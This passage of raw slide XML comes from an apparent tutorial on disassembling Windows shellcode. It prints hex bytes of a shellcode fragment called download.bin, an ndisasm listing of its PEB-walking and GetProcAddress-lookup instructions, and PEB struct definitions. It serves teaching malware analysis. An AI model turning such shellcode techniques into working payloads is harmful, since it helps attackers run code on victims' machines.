                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\x81\x78\x08\x64“</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ro-RO" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Step 2, remove “\x” and quotes and save to a binary file: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ro-RO" sz="1400" dirty="0">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33 C9 64 8B 41 30 8B 40 0C 8B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>70 14 AD 96 AD 8B 58 10 8B 53</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3C 03 D3 8B 52 78 03 D3 8B 72</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>20 03 F3 33 C9 41 AD 03 C3 81</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>38 47 65 74 50 75 F4 81 78 04 </a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO"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72 6F 63 41 75 EB 81 78 08 64</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5638800"/>
            <a:ext cx="8305800" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>HxD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> - Freeware Hex Editor and Disk Editor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://mh-nexus.de/en/hxd/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457200"/>
            <a:ext cx="5334000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Disassemble shellcodes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1752600"/>
            <a:ext cx="8382000" cy="4185761"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\Users\Ionut\AppData\Local\nasm&gt;ndisasm.exe -b 32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> download.bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ro-RO" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000000  33C9              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor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00000002  648B4130          mov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,[fs:ecx+0x30]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000006  8B400C            mov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,[eax+0xc]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000009  8B7014            mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,[eax+0x14]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000000C  AD                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lodsd</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0000000D  96                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xchg</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eax,esi</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0000000E  AD                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lodsd</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0000000F  8B5810            mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,[eax+0x10]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000012  8B533C            mov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,[ebx+0x3c]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000015  03D3              add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx,ebx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00000017  8B5278            mov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,[edx+0x78]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000001A  03D3              add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx,ebx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0000001C  8B7220            mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,[edx+0x20]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000001F  03F3              add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esi,ebx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00000021  33C9              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor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ecx,ecx</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO"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6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6019800"/>
            <a:ext cx="5867400" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" smtClean="0"/>
              <a:t>NASM: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.nasm.us/</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4" y="453011"/>
            <a:ext cx="6615545" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Process Environment Block</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1295400"/>
            <a:ext cx="8534400" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t>	In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>computing the Process Environment Block (abbreviated PEB) is a data structure in Win32. It is an opaque data structure that is used by the operating system internally, most of whose fields are not intended for use by anything other than the operating system.[1] Microsoft notes, in its MSDN Library documentation — which documents only a few of the fields — that the structure "may be altered in future versions of Windows".[2] The PEB contains data structures that apply across a whole process, including global context, startup parameters, data structures for the program image loader, the program image base address, and synchronization objects used to provide mutual exclusion for process-wide data structures.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380999" y="3215878"/>
            <a:ext cx="3733800" cy="1600438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct PEB *GetPEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>asm </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax ,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fs:30h </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4537364" y="3152846"/>
            <a:ext cx="4114800" cy="1169551"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>typedef</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struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> _PEB {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="1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PPEB_LDR_DATA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO"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Ldr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0xC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="1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PEB, *PPEB;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2944091" y="4811251"/>
            <a:ext cx="5715000" cy="1600438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>typedef</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struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> _PEB_LDR_DATA {</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="1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LIST_ENTRY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>InLoadOrderModuleList</a:t>
            </a:r>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LIST_ENTRY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>InMemoryOrder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Module</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>List; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x14</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LIST_ENTRY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>InInit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ialization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OrderModuleList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
